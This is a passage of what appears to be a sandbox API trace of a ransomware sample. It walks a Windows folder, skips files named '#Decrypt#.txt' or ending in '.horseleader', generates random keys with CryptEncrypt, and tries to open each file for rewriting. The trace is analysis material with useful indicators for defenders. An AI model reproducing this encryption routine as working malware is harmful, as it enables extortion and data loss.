Size=0x840) returned 0x7db828 [0229.966] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*") returned 62 [0229.966] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0229.984] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.984] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\.") returned 62 [0229.984] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.984] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0229.985] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.985] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\..") returned 63 [0229.985] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.985] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0229.985] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a407849, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9a407849, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x9a407849, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x15e00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="boxed-correct.avi", cAlternateFileName="")) returned 1 [0229.985] lstrcmpiW (lpString1="boxed-correct.avi", lpString2="Windows") returned -1 [0229.985] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 78 [0229.985] StrStrIW (lpFirst="boxed-correct.avi", lpSrch=".horseleader") returned 0x0 [0229.985] lstrcmpW (lpString1="boxed-correct.avi", lpString2="#Decrypt#.txt") returned 1 [0229.985] lstrcmpW (lpString1="boxed-correct.avi", lpString2="_uninstalling_.png") returned 1 [0229.985] lstrlenW (lpString=".testttjffg") returned 11 [0229.985] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpSrch=".testttjffg") returned 0x0 [0229.985] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.985] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.985] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0xffffffff [0229.996] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23b3de0, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23b3de0, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a49fdc1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7c00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="boxed-delete.avi", cAlternateFileName="")) returned 1 [0229.996] lstrcmpiW (lpString1="boxed-delete.avi", lpString2="Windows") returned -1 [0229.996] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 77 [0229.996] StrStrIW (lpFirst="boxed-delete.avi", lpSrch=".horseleader") returned 0x0 [0229.996] lstrcmpW (lpString1="boxed-delete.avi", lpString2="#Decrypt#.txt") returned 1 [0229.996] lstrcmpW (lpString1="boxed-delete.avi", lpString2="_uninstalling_.png") returned 1 [0229.996] lstrlenW (lpString=".testttjffg") returned 11 [0229.996] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", lpSrch=".testttjffg") returned 0x0 [0229.996] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.996] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0xffffffff [0230.087] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23d9f3d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23d9f3d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a4c5f1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="boxed-join.avi", cAlternateFileName="")) returned 1 [0230.088] lstrcmpiW (lpString1="boxed-join.avi", lpString2="Windows") returned -1 [0230.088] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 75 [0230.088] StrStrIW (lpFirst="boxed-join.avi", lpSrch=".horseleader") returned 0x0 [0230.088] lstrcmpW (lpString1="boxed-join.avi", lpString2="#Decrypt#.txt") returned 1 [0230.088] lstrcmpW (lpString1="boxed-join.avi", lpString2="_uninstalling_.png") returned 1 [0230.088] lstrlenW (lpString=".testttjffg") returned 11 [0230.088] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", lpSrch=".testttjffg") returned 0x0 [0230.088] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.088] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.088] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.088] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24261f7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24261f7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a538339, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf600, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="boxed-split.avi", cAlternateFileName="")) returned 1 [0230.088] lstrcmpiW (lpString1="boxed-split.avi", lpString2="Windows") returned -1 [0230.088] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 76 [0230.088] StrStrIW (lpFirst="boxed-split.avi", lpSrch=".horseleader") returned 0x0 [0230.088] lstrcmpW (lpString1="boxed-split.avi", lpString2="#Decrypt#.txt") returned 1 [0230.089] lstrcmpW (lpString1="boxed-split.avi", lpString2="_uninstalling_.png") returned 1 [0230.089] lstrlenW (lpString=".testttjffg") returned 11 [0230.089] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", lpSrch=".testttjffg") returned 0x0 [0230.089] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.089] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.089] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.089] FindNextFileW 
(in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x244c354, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x244c354, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a55e497, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x30200, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="correct.avi", cAlternateFileName="")) returned 1 [0230.089] lstrcmpiW (lpString1="correct.avi", lpString2="Windows") returned -1 [0230.089] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 72 [0230.089] StrStrIW (lpFirst="correct.avi", lpSrch=".horseleader") returned 0x0 [0230.089] lstrcmpW (lpString1="correct.avi", lpString2="#Decrypt#.txt") returned 1 [0230.089] lstrcmpW (lpString1="correct.avi", lpString2="_uninstalling_.png") returned 1 [0230.089] lstrlenW (lpString=".testttjffg") returned 11 [0230.089] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpSrch=".testttjffg") returned 0x0 [0230.089] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.090] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.090] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.090] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 
| out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24be76b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24be76b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5845f5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="delete.avi", cAlternateFileName="")) returned 1 [0230.090] lstrcmpiW (lpString1="delete.avi", lpString2="Windows") returned -1 [0230.090] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 71 [0230.090] StrStrIW (lpFirst="delete.avi", lpSrch=".horseleader") returned 0x0 [0230.090] lstrcmpW (lpString1="delete.avi", lpString2="#Decrypt#.txt") returned 1 [0230.090] lstrcmpW (lpString1="delete.avi", lpString2="_uninstalling_.png") returned 1 [0230.090] lstrlenW (lpString=".testttjffg") returned 11 [0230.090] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", lpSrch=".testttjffg") returned 0x0 [0230.090] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.090] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.090] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.119] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="FlickLearningWizard.exe.mui", cAlternateFileName="")) returned 1 [0230.119] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2="Windows") returned -1 [0230.119] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 88 [0230.119] StrStrIW (lpFirst="FlickLearningWizard.exe.mui", lpSrch=".horseleader") returned 0x0 [0230.119] lstrcmpW (lpString1="FlickLearningWizard.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0230.119] lstrcmpW (lpString1="FlickLearningWizard.exe.mui", lpString2="_uninstalling_.png") returned 1 [0230.119] lstrlenW (lpString=".testttjffg") returned 11 [0230.119] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui", lpSrch=".testttjffg") returned 0x0 [0230.119] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.119] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.119] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.169] FindNextFileW (in: 
hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc8723b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdc8723b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="InkObj.dll.mui", cAlternateFileName="")) returned 1 [0230.169] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2="Windows") returned -1 [0230.169] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 75 [0230.169] StrStrIW (lpFirst="InkObj.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.169] lstrcmpW (lpString1="InkObj.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.169] lstrcmpW (lpString1="InkObj.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.169] lstrlenW (lpString=".testttjffg") returned 11 [0230.169] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.169] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.169] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.170] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.170] FindNextFileW (in: hFindFile=0x7c6760, 
lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="InkWatson.exe.mui", cAlternateFileName="")) returned 1 [0230.170] lstrcmpiW (lpString1="InkWatson.exe.mui", lpString2="Windows") returned -1 [0230.170] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 78 [0230.170] StrStrIW (lpFirst="InkWatson.exe.mui", lpSrch=".horseleader") returned 0x0 [0230.170] lstrcmpW (lpString1="InkWatson.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0230.170] lstrcmpW (lpString1="InkWatson.exe.mui", lpString2="_uninstalling_.png") returned 1 [0230.170] lstrlenW (lpString=".testttjffg") returned 11 [0230.170] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui", lpSrch=".testttjffg") returned 0x0 [0230.170] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.170] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.171] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkwatson.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.233] FindNextFileW (in: 
hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="InputPersonalization.exe.mui", cAlternateFileName="")) returned 1 [0230.233] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2="Windows") returned -1 [0230.233] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 89 [0230.234] StrStrIW (lpFirst="InputPersonalization.exe.mui", lpSrch=".horseleader") returned 0x0 [0230.234] lstrcmpW (lpString1="InputPersonalization.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0230.234] lstrcmpW (lpString1="InputPersonalization.exe.mui", lpString2="_uninstalling_.png") returned 1 [0230.234] lstrlenW (lpString=".testttjffg") returned 11 [0230.234] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui", lpSrch=".testttjffg") returned 0x0 [0230.234] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.234] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.234] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.254] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5800, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="IPSEventLogMsg.dll.mui", cAlternateFileName="")) returned 1 [0230.254] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2="Windows") returned -1 [0230.254] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 83 [0230.254] StrStrIW (lpFirst="IPSEventLogMsg.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.254] lstrcmpW (lpString1="IPSEventLogMsg.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.254] lstrcmpW (lpString1="IPSEventLogMsg.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.254] lstrlenW (lpString=".testttjffg") returned 11 [0230.254] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.254] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.254] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.254] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.255] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="IpsMigrationPlugin.dll.mui", cAlternateFileName="")) returned 1 [0230.255] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="Windows") returned -1 [0230.255] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 87 [0230.255] StrStrIW (lpFirst="IpsMigrationPlugin.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.255] lstrcmpW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.255] lstrcmpW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.255] lstrlenW (lpString=".testttjffg") returned 11 [0230.255] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 